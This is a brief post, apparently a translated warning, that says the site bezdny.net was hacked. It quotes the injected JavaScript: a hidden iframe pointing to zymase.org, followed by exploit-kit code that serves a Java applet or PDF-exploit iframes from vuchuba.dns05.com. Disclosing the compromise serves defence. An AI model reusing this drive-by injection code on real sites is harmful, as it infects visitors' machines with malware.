Hacking bezdny.net

The site bezdny.net (aggregator of the “best abyss” site bash.im) was hacked and trying to push the exploit in Java and through a vulnerability in pdf.

Recently, at the end of the page, this is what will open:

<script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://zymase.org/index.php?r=9bb1291'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();</script> 

Go ahead on zymaze.org. No referer redirects to about: blank, but with a referrer

  <script> if(navigator.javaEnabled()==true){ document.write("<applet width='100%' height='100%' code='site.Attacker.class' archive='http://vuchuba.dns05.com/profile.php?exp=byte&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44'><param name='url' VALUE='http://vuchuba.dns05.com/y41gr.php?exp=byte&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44'></applet>"); };</script> <script> function pdfone() { document.write("<iframe width='168' height='172' frameborder='1' src='http://vuchuba.dns05.com/profile.php?exp=lib&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44&host=http://vuchuba.dns05.com'></iframe>"); } function pdftwo() { document.write("<iframe width='168' height='172' frameborder='1' src='http://vuchuba.dns05.com/profile.php?exp=lib&b=1f66e6f&k=fa99dbc4c1ce9aa78c7840b787e75b44&host=http://vuchuba.dns05.com'></iframe>"); } var roman = navigator.userAgent.toLowerCase(); if(navigator.javaEnabled()==false){ if(roman.indexOf('msie') != -1){ setTimeout(pdfone, 0); } else { setTimeout(pdftwo, 0); };};</script> 

Further poking did not. Be carefull.